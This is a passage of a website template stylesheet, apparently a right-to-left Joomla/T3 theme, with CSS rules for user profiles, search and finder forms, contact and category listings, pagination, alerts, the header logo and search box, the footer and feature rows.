  font-weight: bold;
  text-align: left;
  width: 130px;
}
.user-details .input,
.user-details .inputbox {
  margin-right: 10px;
  width: 200px;
}
.user-details .btn,
.user-details button {
  margin-right: 140px;
}
.user-details .paramlist .paramlist_key {
  padding: 0 0 5px;
  width: 130px;
}
.user-details .paramlist .paramlist_value {
  padding: 0 0 5px;
}
.user-details .user_name span {
  font-weight: bold;
  padding-right: 10px;
}
.reset .form-validate p,
.remind .form-validate p {
  background: #eeeeee;
  border: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding: 10px 20px;
  border-radius: 0;
}
.reset .form-validate fieldset dl,
.remind .form-validate fieldset dl {
  margin: 0;
}
.reset .form-validate fieldset dt,
.remind .form-validate fieldset dt {
  margin: 4px 0 0 0;
}
.profile-edit input {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit input {
    float: right;
    width: 50%;
  }
}
.profile-edit select {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit select {
    float: right;
    width: 50%;
  }
}
.profile-edit select + button {
  margin-right: 5px;
}
#searchForm:before,
#searchForm:after {
  display: table;
  content: " ";
}
#searchForm:after {
  clear: both;
}
#searchForm fieldset {
  margin: 20px 0;
}
#searchForm legend {
  margin-bottom: 10px;
}
#searchForm select {
  width: auto;
  display: inline-block;
  margin-right: 5px;
  padding-right: 5px;
}
#searchForm .form-limit {
  margin-top: 20px;
}
#searchForm .form-limit .counter {
  margin-top: 0;
  border: none;
  font-size: 14px;
  font-weight: bold;
  color: #0077bb;
}
@media screen and (max-width: 768px) {
  #searchForm .radio-inline,
  #searchForm .checkbox-inline {
    display: block;
    width: 100%;
    margin-right: 0;
  }
}
.search-results {
  margin-top: 20px;
}
.search-results .result-title {
  font-size: 16px;
  font-weight: bold;
  margin-top: 20px;
}
.search-results .result-category {
  font-size: 12px;
  color: #999999;
}
.search-results .result-text {
  margin-top: 5px;
  margin-bottom: 5px;
}
.search-results .result-url {
  color: #666666;
  margin-top: 20px;
}
.search-results .result-created {
  font-size: 12px;
  color: #999999;
}
div.finder {
  margin-bottom: 20px;
}
div.finder .input-group {
  display: flex;
}
div.finder .input-group input {
  flex: 1;
}
div.finder .com-finder__tips {
  margin-top: 20px;
}
#finder-filter-window {
  margin-top: 20px;
}
#finder-filter-window #finder-filter-select-dates {
  display: grid;
  grid-template-columns: 1fr;
  gap: 10px;
  margin-bottom: 40px;
}
@media screen and (min-width: 1200px) {
  #finder-filter-window #finder-filter-select-dates {
    grid-template-columns: repeat(2, 1fr);
  }
}
#finder-filter-window #finder-filter-select-dates .filter-date {
  display: flex;
  flex-wrap: wrap;
  padding: 0;
  gap: 10px;
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date label {
  flex-basis: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date select.inputbox {
  margin: 0;
  width: 100% !important;
  max-width: unset;
}
#finder-filter-window #finder-filter-select-dates .filter-date .field-calendar {
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date .field-calendar .form-control {
  flex: 1;
  max-width: unset;
  width: 100%;
}
#finder-filter-window #finder-filter-select-dates .filter-date .chzn-container {
  margin-bottom: 6px;
}
#finder-filter-window #finder-filter-select-dates .filter-date br {
  display: none;
}
#finder-filter-window .filter-branch {
  display: flex;
  flex-wrap: wrap;
  flex-direction: column;
  gap: 10px;
  width: 100%;
}
@media (min-width: 1200px) {
  #finder-filter-window .filter-branch {
    flex-direction: row;
  }
}
#finder-filter-window .filter-branch .control-label {
  padding: 0;
  margin-bottom: 10px;
}
#finder-filter-window .filter-branch .controls {
  margin-right: 0;
}
#finder-filter-window .filter-branch .controls select {
  color: #9e9e9e;
  width: 100%;
}
.contact .contact-form .checkbox input#jform_contact_email_copy {
  margin-right: 0;
}
.contact .thumbnail {
  padding: 4px;
}
.contact dd::after {
  display: none;
}
.contact .icon-address::before {
  content: '\f02d';
}
.contact .icon-fax::before {
  content: '\f109';
}
.contact .accordion-heading .accordion-toggle {
  font-weight: bold;
}
#archive-items > li {
  line-height: normal;
  margin: 0;
  overflow: visible;
  padding: 0;
}
#archive-items .intro {
  clear: both;
  overflow: hidden;
}
.categories-list {
  margin-bottom: 20px;
}
.contact-category ul.category {
  border-top: 0;
  overflow: hidden;
}
.contact-category ul.category li.row-fluid {
  border: 1px solid #eeeeee;
  width: 100%;
  margin-left: 0;
  margin-right: 0;
}
.contact-category ul.category li.row-fluid:before,
.contact-category ul.category li.row-fluid:after {
  display: table;
  content: " ";
}
.contact-category ul.category li.row-fluid:after {
  clear: both;
}
.contact-category ul.category li.row-fluid > div {
  margin: 0;
}
.contact-category .cat-children ul {
  border: 0;
  border-top: 1px solid #eeeeee;
}
.contact-category .cat-children ul li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 5px 0 5px 0;
}
.contact-category .cat-children ul li h4 {
  border-right: 1px dotted #999999;
  font-size: 14px;
  font-weight: 600;
  padding: 0;
  padding-right: 15px;
  margin-right: 20px;
  position: relative;
}
.contact-category .cat-children ul li h4:after {
  border-top: 1px dotted #999999;
  display: block;
  content: "";
  position: absolute;
  right: 0;
  top: 8px;
  height: 1px;
  width: 10px;
}
.contact-category .cat-children ul li li h4 {
  margin-right: 40px;
}
.contact-category .cat-children ul li li li h4 {
  margin-right: 60px;
}
.contact-category .cat-children ul li li li li h4 {
  margin-right: 80px;
}
.contact-category .cat-children ul li:last-child {
  border: 0;
}
.category-item:before,
.category-item:after {
  display: table;
  content: " ";
}
.category-item:after {
  clear: both;
}
.category-item .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.category-item .category-item {
  margin-bottom: 0;
  margin-right: 40px;
}
.category-item .category-item .page-header {
  font-size: 14px;
}
.cat-children .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.newsfeed-category > h2,
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed-category .category-desc,
.newsfeed .category-desc {
  margin-bottom: 20px;
}
.newsfeed-category .category li:before,
.newsfeed .category li:before,
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  display: table;
  content: " ";
}
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  clear: both;
}
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed .feed-description {
  margin-bottom: 20px;
  font-size: 16px;
}
.newsfeed .feed-item-description .feed-description {
  font-size: 14px;
}
.newsfeed ol li > a {
  font-weight: bold;
  font-size: 16px;
}
.article-content .pagination ul {
  border-right: 1px solid #eeeeee;
}
.article-content .pagination li {
  float: right;
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #eeeeee;
  border-right: 0;
}
.article-content .pagination li a {
  border: 0;
  text-decoration: none;
  background-color: transparent;
  line-height: normal;
  padding: 0;
}
.pagenavcounter {
  margin: 0 0 20px;
  font-weight: bold;
}
#article-index,
.article-index {
  margin: 0 20px 20px 0;
  padding: 10px;
  width: 25%;
  border: 1px solid #eeeeee;
  border-radius: 0;
}
#article-index ul,
.article-index ul {
  margin: 0;
  padding: 0;
  border: 0;
}
#article-index ul > li,
.article-index ul > li {
  border: 0;
  margin-top: 2px;
}
#article-index ul > li > a,
.article-index ul > li > a {
  border: 0;
  padding: 5px;
  border-radius: 0;
}
#article-index ul > .active > a,
.article-index ul > .active > a {
  border: 0;
  background: #ff8800;
  color: #ffffff;
}
#article-index ul > .active > a:hover,
.article-index ul > .active > a:hover,
#article-index ul > .active > a:active,
.article-index ul > .active > a:active,
#article-index ul > .active > a:focus,
.article-index ul > .active > a:focus {
  border: 0;
  background: #ff8800;
  color: #ffffff;
}
.pagenavigation ul.pagination,
.pagenav {
  float: none;
  margin: 0;
  padding: 0;
  list-style: none;
  display: flex;
  justify-content: space-between;
}
.pagenavigation ul.pagination > li,
.pagenav > li {
  margin: 0;
  padding: 0;
  float: right;
}
.pagenavigation ul.pagination > li.pagenav-prev,
.pagenav > li.pagenav-prev,
.pagenavigation ul.pagination > li.previous,
.pagenav > li.previous {
  margin-left: 10px;
}
.pagenavigation ul.pagination > li.pagenav-next,
.pagenav > li.pagenav-next,
.pagenavigation ul.pagination > li.next,
.pagenav > li.next {
  margin-right: auto;
}
.pagenavigation ul.pagination li > a,
.pagenav li > a {
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #dddddd;
  border-radius: 0;
}
.pagenavigation ul.pagination li > a:hover,
.pagenav li > a:hover,
.pagenavigation ul.pagination li > a:active,
.pagenav li > a:active,
.pagenavigation ul.pagination li > a:focus,
.pagenav li > a:focus {
  background-color: #eeeeee;
}
.items-more h3 {
  margin: 0 0 20px;
}
.items-more .nav > li {
  border-top: 1px solid #eeeeee;
}
.items-more .nav > li > a {
  padding: 6px 5px;
}
.back_button a {
  display: block;
  margin: 10px 0;
}
.filters {
  margin: 10px 0 5px;
}
.display-limit {
  margin: 10px 0 5px;
}
.filters .display-limit {
  float: left;
  text-align: left;
}
#system-message dt {
  font-weight: bold;
}
#system-message dd {
  font-weight: bold;
}
#system-message dd.message ul,
#system-message dd.error ul,
#system-message dd.notice ul {
  margin: 0;
  padding: 0;
}
#system-message dd.message ul li,
#system-message dd.error ul li,
#system-message dd.notice ul li {
  background: none;
  margin: 0;
  padding: 5px;
}
.alert-message {
  color: #468847;
  background-color: #dff0d8;
  border-color: #d6e9c6;
}
.alert-message hr {
  border-top-color: #c9e2b3;
}
.alert-message .alert-link {
  color: #356635;
}
.alert-notice {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.alert-notice hr {
  border-top-color: #a6e1ec;
}
.alert-notice .alert-link {
  color: #2d6987;
}
.alert-error {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.alert-error hr {
  border-top-color: #e4b9c0;
}
.alert-error .alert-link {
  color: #953b39;
}
.alert-error .alert-message {
  background: transparent;
  color: inherit;
}
.tip-wrap {
  background: #fff6df;
  border: 1px solid #fb3;
  border-radius: 5px;
  -webkit-box-shadow: none;
  box-shadow: none;
  max-width: 300px;
  z-index: 999;
}
.tip-title {
  border-bottom: 1px solid #fb3;
  font-weight: bold;
  padding: 5px 10px;
}
.tip-text {
  font-size: 14px;
  margin: 0;
  padding: 5px 10px;
}
.hasTip img {
  border: none;
  margin: 0 0 0 5px;
}
@media (min-width: 768px) {
  .languageswitcherload {
    float: left;
    width: 100%;
  }
  .languageswitcherload .mod-languages {
    text-align: left;
  }
}
div.calendar {
  width: 187px;
}
dl.tabs {
  border-bottom: 1px solid #d9d9d9;
  display: block;
  clear: both;
  margin-bottom: 0;
}
dl.tabs:before,
dl.tabs:after {
  display: table;
  content: " ";
}
dl.tabs:after {
  clear: both;
}
dl.tabs dt.tabs {
  border: 1px solid #d9d9d9;
  display: inline-block;
  padding: 10px 20px;
  margin-left: 5px;
  margin-bottom: -1px;
}
dl.tabs dt.tabs h3 {
  margin: 0;
  font-size: 14px;
}
dl.tabs dt.tabs h3 a {
  color: #444444;
  outline: none;
}
dl.tabs dt.tabs h3 a:hover,
dl.tabs dt.tabs h3 a:focus,
dl.tabs dt.tabs h3 a:active {
  color: #b35f00;
  text-decoration: none;
}
dl.tabs dt.tabs.open {
  border-bottom-color: #ffffff;
}
dl.tabs dt.tabs.open a {
  font-weight: bold;
}
.iframe-bordered {
  border: 1px solid #dddddd;
}
.chzn-container {
  display: inline-block;
  vertical-align: middle;
}
.chzn-container-single .chzn-single,
.chzn-container-multi .chzn-choices .search-field input,
.chzn-container-single .chzn-search input {
  height: 26px;
}
.chzn-container-single .chzn-drop,
.chzn-container .chzn-drop {
  -webkit-box-sizing: content-box !important;
  -moz-box-sizing: content-box !important;
  box-sizing: content-box !important;
}
.input-prepend .chzn-container-single .chzn-single {
  border-color: #cccccc;
  height: 26px;
  border-radius: 3px 0 0 3px;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.input-prepend .chzn-container-active .chzn-single-with-drop {
  border-radius: 3px 0 0 0;
}
.input-prepend .chzn-container-single .chzn-drop {
  border-color: #cccccc;
}
.btn-group .chzn-results {
  white-space: normal;
}
.js-stools-container-filters .js-stools-field-filter .chzn-single,
.js-stools-container-filters .js-stools-field-filter .chzn-drop {
  border-radius: 0;
}
.js-stools-container-filters .js-stools-field-filter #filter_tag_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_category_id_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_access_chzn,
.js-stools-container-filters .js-stools-field-filter #filter_author_id_chzn {
  width: auto !important;
}
.js-stools-container-filters .js-stools-field-filter #filter_tag_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_category_id_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_access_chzn ul li input,
.js-stools-container-filters .js-stools-field-filter #filter_author_id_chzn ul li input {
  width: 208px !important;
  height: 24px !important;
}
.picker {
  background: green !important;
}
.picker .picker__box .picker__header {
  display: flex;
}
.picker .picker__box .picker__header .picker__select--month {
  margin-right: 20px;
}
#glossary-detail .modal-dialog {
  height: 100vh;
  position: relative;
}
#glossary-detail .modal-content {
  padding: 24px;
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
}
#glossary-detail .modal-content .modal-header {
  flex-direction: row-reverse;
  justify-content: space-between;
  padding: 0 0 24px;
}
#glossary-detail .modal-content .modal-header::after,
#glossary-detail .modal-content .modal-header::before {
  display: none;
}
#glossary-detail .modal-content .modal-header .close {
  padding: 6px 10px;
  background-color: #005788;
  color: #fff;
  opacity: 1;
  transition: all 0.3s ease-in-out;
}
#glossary-detail .modal-content .modal-header .close:hover {
  opacity: .7;
}
#glossary-detail .modal-content .modal-body {
  margin-top: 24px;
}

.page-header {
  padding-bottom: 20px;
  margin: 0 0 20px;
  border-bottom: 1px solid #eeeeee;
}
.page-title,
.page-header h1 {
  line-height: 1;
  margin: 0;
}
.page-subheader {
  border-bottom: 1px solid #eeeeee;
  margin: 0 0 20px;
  padding-bottom: 20px;
}
.page-subheader:before,
.page-subheader:after {
  display: table;
  content: " ";
}
.page-subheader:after {
  clear: both;
}
.page-subtitle,
.page-subheader h2 {
  line-height: 1;
  margin: 0;
}
.page-header + .page-subheader {
  margin-top: -20px;
}
.article-title h1 a:hover,
.article-header h1 a:hover,
.article-title h2 a:hover,
.article-header h2 a:hover,
.article-title h1 a:active,
.article-header h1 a:active,
.article-title h2 a:active,
.article-header h2 a:active,
.article-title h1 a:focus,
.article-header h1 a:focus,
.article-title h2 a:focus,
.article-header h2 a:focus {
  text-decoration: none;
}
.article-title,
.article-header h1 {
  margin: 0 0 20px 0;
}
@media screen and (max-width: 767px) {
  .article-title,
  .article-header h1 {
    font-size: 24px;
  }
}
@media screen and (max-width: 767px) {
  h2.article-title,
  .article-header h2 {
    font-size: 24px;
  }
}
.item-title {
  font-weight: bold;
}
.jumbotron:before,
.jumbotron:after {
  display: table;
  content: " ";
}
.jumbotron:after {
  clear: both;
}
.jumbotron h1,
.jumbotron h2,
.jumbotron h3 {
  margin-top: 0;
}
.jumbotron p {
  color: #666666;
}
.jumbotron p:last-child {
  margin-bottom: 0;
}
.container .jumbotron {
  border-radius: 0;
}
.jumbotron .btn {
  margin-top: 20px;
  margin-bottom: 20px;
}
.masthead {
  padding-top: 40px;
  padding-bottom: 40px;
  text-align: center;
}
.masthead p:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .masthead {
    padding-top: 80px;
    padding-bottom: 80px;
  }
  .masthead h1 {
    font-size: 84px;
  }
  .masthead p {
    font-size: 28px;
  }
  .masthead .btn-lg {
    padding: 15px 40px;
    font-size: 24px;
  }
}
.jumbotron-primary {
  background-color: #ff8800;
}
.jumbotron-primary h1,
.jumbotron-primary h2,
.jumbotron-primary h3 {
  color: #ffffff;
}
.jumbotron-primary p {
  color: #ffffff;
}
.jumbotron-primary .btn-primary {
  border-color: #fff;
}
.page-masthead:before,
.page-masthead:after {
  display: table;
  content: " ";
}
.page-masthead:after {
  clear: both;
}
.page-masthead .jumbotron {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
  padding-top: 60px;
  padding-bottom: 60px;
  padding-right: 0;
  padding-left: 0;
}
@media screen and (max-width: 991px) {
  .page-masthead .jumbotron {
    padding-top: 40px;
    padding-bottom: 40px;
  }
}
@media screen and (max-width: 767px) {
  .page-masthead .jumbotron {
    padding-right: 20px;
  }
  .page-masthead .jumbotron .container {
    padding: 0;
  }
}
.label {
  border-radius: 0;
}
.label:empty {
  display: none;
}
.badge:empty {
  display: none;
}
.btn .badge {
  position: relative;
  top: -1px;
}
.page-header .label,
.page-header .badge {
  vertical-align: middle;
}
.thumbnail {
  padding: 0;
  margin-bottom: 40px;
}
.alert h4 {
  color: inherit;
}
.media:first-child {
  margin-top: 0;
}
.media-object {
  display: block;
}
.media-heading {
  margin: 0 0 5px;
}
.media > .pull-left {
  margin-left: 10px;
}
.media > .pull-right {
  margin-right: 10px;
}
.list-group-item > .badge {
  float: left;
}
.list-group-item > .badge + .badge {
  margin-left: 5px;
}
a.list-group-item.active .list-group-item-heading,
a.list-group-item.active:hover .list-group-item-heading,
a.list-group-item.active:focus .list-group-item-heading {
  color: inherit;
}
a.list-group-item.active .list-group-item-text,
a.list-group-item.active:hover .list-group-item-text,
a.list-group-item.active:focus .list-group-item-text {
  color: #ffe7cc;
}
.panel-heading > .dropdown .dropdown-toggle {
  color: inherit;
}
.panel-title > a {
  color: inherit;
}
.modal-backdrop.fade {
  filter: alpha(opacity=0);
  opacity: 0;
}
.modal-backdrop.in {
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.modal-header {
  border-bottom: 0;
  padding: 20px 40px 0;
}
.modal-title {
  font-size: 35px;
}
.modal-body {
  padding: 10px 40px 20px;
}
.modal-body iframe {
  width: 100%;
  max-height: none;
  border: 0 !important;
}
@media screen and (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
}

.logo {
  position: absolute;
  top: 0;
  right: 0;
  padding: 0;
  margin: 0;
}
.logo a {
  background: transparent;
  color: #fff;
  text-decoration: none;
  display: inline-block;
  line-height: 1;
  margin: 0;
}
.logo:hover a,
.logo a:hover,
.logo a:active,
.logo a:focus {
  background: #e67a00;
  color: #ffffff;
  text-decoration: none;
}
@media screen and (min-width: 991px) {
  .logo {
    position: static;
  }
  .logo a {
    background: #e67a00;
  }
  .logo:hover a,
  .logo a:hover,
  .logo a:active,
  .logo a:focus {
    color: #ffffff;
  }
}
.off-canvas-toggle + .container .navbar-header .logo {
  right: 55px;
  border-right: 1px solid #e67a00;
}
@media screen and (min-width: 991px) {
  .off-canvas-toggle + .container .navbar-header .logo {
    border-right: 0;
  }
}
.logo-image > a {
  max-width: 160px;
  max-height: 55px;
}
.logo-image > a > img {
  max-width: 100%;
}
.logo-image span,
.logo-image small {
  display: none;
}
.logo-text {
  text-transform: uppercase;
  font-size: 18px;
}
.logo-text a {
  line-height: 55px;
  padding: 0 20px;
}
.logo-text .site-slogan {
  display: none;
}
.head-search {
  height: 55px;
  position: absolute;
  left: 0;
  margin: 0;
  z-index: 1000;
}
.head-search form {
  margin: 0;
}
.head-search label {
  display: none;
}
.head-search .search {
  background: #ff8800;
  border-right: 1px solid #e67a00;
  border-left: 1px solid #e67a00;
  position: relative;
}
@media screen and (min-width: 991px) {
  .head-search .search {
    background: #e67a00;
  }
}
.head-search .search .fa-search {
  color: #ffffff;
  content: "\f002";
  display: block;
  font-family: "FontAwesome";
  position: absolute;
  right: 20px;
  top: 19px;
  z-index: 1;
}
.head-search .search .fa-search:hover {
  z-index: 0;
}
.head-search .form-control {
  border: 0;
  background: transparent;
  color: #ffffff;
  height: 54px;
  line-height: 35px;
  position: relative;
  margin: 0;
  padding: 10px 40px 10px 15px;
  width: 0;
  -webkit-transition: width 0.2s;
  -o-transition: width 0.2s;
  transition: width 0.2s;
}
@media screen and (min-width: 991px) {
  .head-search .form-control {
    height: 55px;
  }
}
.head-search .form-control:hover,
.head-search .form-control:active,
.head-search .form-control:focus {
  color: #ffffff;
  box-shadow: none;
}
.head-search .form-control:active,
.head-search .form-control:focus {
  width: 180px;
}
.head-search .form-control:-webkit-autofill {
  -webkit-box-shadow: 0 1000px 0 0 #0067a2 inset;
  -webkit-text-fill-color: #ffffff;
}
.head-search .form-control::-moz-placeholder {
  color: #ffffff;
}
.head-search .mod-finder input {
  z-index: 10;
}
.head-search .mod-finder > .awesomplete {
  position: relative;
}
.head-search .mod-finder > .awesomplete::after {
  content: '\f002';
  color: #bbe6ff;
  display: inline-block;
  font-family: "FontAwesome";
  height: 16px;
  width: 16px;
  position: absolute;
  top: 19px;
  margin-right: 20px;
}
.head-search .mod-finder .mod-finder__search input {
  width: 100px;
  padding: 10px 15px;
}
@media screen and (max-width: 576px) {
  .head-search .mod-finder .mod-finder__search input {
    width: 50px;
  }
}
.head-search .mod-finder .mod-finder__search input:focus {
  width: 200px;
}
.navbar-toggle + .head-search {
  left: 55px;
  max-width: 57px;
}
@media screen and (max-width: 990px) {
  .navbar-toggle + .head-search {
    max-width: inherit;
  }
  .navbar-toggle + .head-search:hover,
  .navbar-toggle + .head-search:focus,
  .navbar-toggle + .head-search:active {
    max-width: none;
  }
  .navbar-toggle + .head-search:hover .form-control,
  .navbar-toggle + .head-search:focus .form-control,
  .navbar-toggle + .head-search:active .form-control {
    width: 180px;
  }
}
@media screen and (min-width: 991px) {
  .head-search,
  .navbar-toggle + .head-search {
    left: 20px;
    top: 0;
    max-width: none;
  }
}
.chzn-container-multi .chzn-choices li.search-field input[type="text"] {
  height: 30px;
}
.chzn-container {
  max-width: 100%;
}
.chzn-container .chzn-single {
  max-width: 260px;
}
.ie8 .radio.t3onoff {
  border: 0;
}
.ie8 label.on,
.ie8 label.off {
  border: 1px solid #eeeeee;
}
.pagination > li > a,
.pagination > li > span {
  margin-bottom: 10px;
}
#eblog-wrapper {
  line-height: 1.625;
}
.com_weblinks .weblink-categories .page-header.item-title .btn {
  padding: 5px;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-minus {
  display: block;
}
.com_weblinks .weblink-categories .page-header.item-title .btn .fa-plus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-minus {
  display: none;
}
.com_weblinks .weblink-categories .page-header.item-title .btn.collapsed .fa-plus {
  display: block;
}
.t3-spotlight {
  display: -webkit-flex;
  display: flex;
  -webkit-flex-flow: row wrap;
  flex-flow: row wrap;
}
@media screen and (max-width: 767px) {
  .t3-spotlight > div {
    margin-bottom: 20px;
  }
}
@media screen and (min-width: 992px) {
  .t3-spotlight:not(:root:root) .col-md-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-md-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-md-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-md-12 {
    width: 100%;
  }
}
@media screen and (max-width: 991px) {
  .t3-spotlight:not(:root:root) .col-sm-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-sm-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-sm-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-sm-12 {
    width: 100%;
  }
}
@media screen and (max-width: 767px) {
  .t3-spotlight:not(:root:root) .col-xs-3 {
    width: 24.9%;
  }
  .t3-spotlight:not(:root:root) .col-xs-4 {
    width: 33.2%;
  }
  .t3-spotlight:not(:root:root) .col-xs-6 {
    width: 49.8%;
  }
  .t3-spotlight:not(:root:root) .col-xs-12 {
    width: 100%;
  }
}
.t3-sl {
  padding-bottom: 40px;
  padding-top: 40px;
}
@media screen and (max-width: 767px) {
  .t3-sl {
    padding-bottom: 20px;
    padding-top: 20px;
  }
}
.t3-sl .t3-module {
  margin-bottom: 0;
}
.t3-sl .t3-module + .t3-module {
  margin-top: 20px;
}
@media screen and (min-width: 768px) {
  .t3-sl {
    padding-bottom: 60px;
    padding-top: 60px;
  }
}
.t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.t3-mainbody {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-content {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-sidebar {
  padding-top: 20px;
  padding-bottom: 20px;
}
.t3-footer {
  background: #f7f7f7;
  color: #666666;
}
.t3-footer:before,
.t3-footer:after {
  display: table;
  content: " ";
}
.t3-footer:after {
  clear: both;
}
.t3-footer small {
  display: block;
  font-size: 100%;
}
.t3-footer-sl {
  padding: 20px 0;
}
.t3-footer-sl:before,
.t3-footer-sl:after {
  display: table;
  content: " ";
}
.t3-footer-sl:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .t3-footer-sl {
    padding: 40px 0;
  }
}
.t3-footer-sl .t3-module {
  background: #f7f7f7;
  color: #666666;
  margin-top: 10px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module .module-title {
  color: #444444;
  font-size: 18px;
  margin-bottom: 10px;
}
.t3-footer-sl .t3-module ul {
  list-style: none;
  margin-right: 0;
  margin-bottom: 0;
  padding-right: 0;
}
.t3-footer-sl .t3-module ul > li {
  line-height: 24px;
}
.t3-footer-sl .t3-module ul > li > a {
  color: #666666;
}
.t3-footer-sl .t3-module ul > li > a:hover,
.t3-footer-sl .t3-module ul > li > a:active,
.t3-footer-sl .t3-module ul > li > a:focus {
  color: #666666;
}
#back-to-top {
  z-index: 999;
  position: fixed;
  left: 20px;
  top: auto;
}
#back-to-top.affix {
  bottom: 40px;
}
#back-to-top a {
  outline: none;
}
#back-to-top i {
  font-size: 28px;
}
.t3-copyright {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding: 40px 0 80px;
}
.t3-copyright:before,
.t3-copyright:after {
  display: table;
  content: " ";
}
.t3-copyright:after {
  clear: both;
}
.t3-copyright small {
  margin-bottom: 5px;
}
.copyright {
  margin-bottom: 20px;
}
.poweredby:before,
.poweredby:after {
  display: table;
  content: " ";
}
.poweredby:after {
  clear: both;
}
@media screen and (min-width: 991px) {
  .poweredby {
    text-align: left;
  }
}
.poweredby .t3-logo,
.poweredby .t3-logo-small {
  display: inline-block;
}
.mod-preview-info {
  z-index: 2000;
}
#ezblog-body .blog-text p,
#ezblog-body .blog-text li {
  line-height: 1.625;
}
.features-intro .t3-content {
  padding-top: 0;
  padding-bottom: 0;
}
.row-feature {
  border-top: 1px solid #eeeeee;
  padding: 40px 0;
  font-size: 16px;
  color: #666666;
  line-height: 1.5;
}
.page-masthead .row-feature {
  padding: 40px 0;
}
@media screen and (min-width: 992px) {
  .row-feature {
    padding: 60px 0;
  }
  .page-masthead .row-feature {
    padding: 100px 0;
  }
}
.row-feature h1,
.row-feature h2,
.row-feature h3 {
  line-height: 1.15;
  color: #444444;
}
.row-feature h1 {
  margin-top: 0;
  margin-bottom: 60px;
  font-weight: 300;
}
@media screen and (min-width: 768px) {
  .row-feature h1 {
    font-size: 84px;
  }
}
.row-feature h1 + p {
  margin-top: -55px;
}
.row-feature h2 {
  margin-top: 0;
  margin-bottom: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature h2 {
    font-size: 42px;
  }
}
.row-feature h3 {
  margin-top: 20px;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .row-feature h3 {
    font-size: 27.6px;
  }
}
.row-feature h3 + p {
  margin-top: -10px;
}
.row-feature .feature-ct {
  width: 100%;
  padding-top: 10px;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image + .feature-ct {
    width: 50%;
    float: left;
    padding-right: 20px;
  }
  .row-feature .pull-right.item-image + .feature-ct {
    width: 50%;
    float: right;
    padding-left: 20px;
  }
}
.row-feature.text-center {
  text-align: center;
}
.row-feature.row-feature-alt,
.row-feature:nth-child(even) {
  background: #f7f7f7;
}
.row-feature.row-feature-primary {
  background: #ff8800;
  color: #ffffff;
}
.row-feature.row-feature-primary h1,
.row-feature.row-feature-primary h2,
.row-feature.row-feature-primary h3 {
  color: #ffffff;
}
.row-feature.row-feature-primary .feature-ct,
.row-feature.row-feature-primary p {
  color: #ffffff;
}
.row-feature.row-feature-primary .btn-primary {
  border-color: #fff;
}
.row-feature.row-feature-primary + .row-feature-primary {
  border-top: 1px solid #cc6d00;
}
.row-feature .row-feature-narrow {
  padding-top: 20px;
  padding-bottom: 20px;
}
.row-feature:first-child {
  border-top: 0;
}
.row-feature .item-image {
  width: 100%;
  float: none;
  margin-bottom: 20px;
}
.row-feature .item-image img {
  max-width: 100%;
}
@media screen and (min-width: 768px) {
  .row-feature .pull-left.item-image,
  .row-feature .pull-right.item-image {
    max-width: 50%;
    min-width: 25%;
    margin-bottom: 0;
  }
  .row-feature .pull-left.item-image {
    float: right;
    text-align: right;
    padding-left: 20px;
  }
  .row-feature .pull-right.item-image {
    float: left;
    text-align: left;
    padding-right: 20px;
  }
}
.row-feature .page-header {
  border: 0;
  margin: 0 0 20px;
  padding: 0;
}
.row-feature .jumbotron {
  background: transparent;
  position: relative;
  margin-top: 0;
  margin-bottom: 20px;
  padding-top: 0;
  padding-bottom: 0;
  text-align: center;
}
@media screen and (min-width: 768px) {
  .row-feature .jumbotron {
    margin-bottom: 60px;
  }
}
.row-feature .gallery .thumbnail {
  border: 0;
  padding: 0;
}
.row-feature .gallery .thumbnail a {
  display: block;
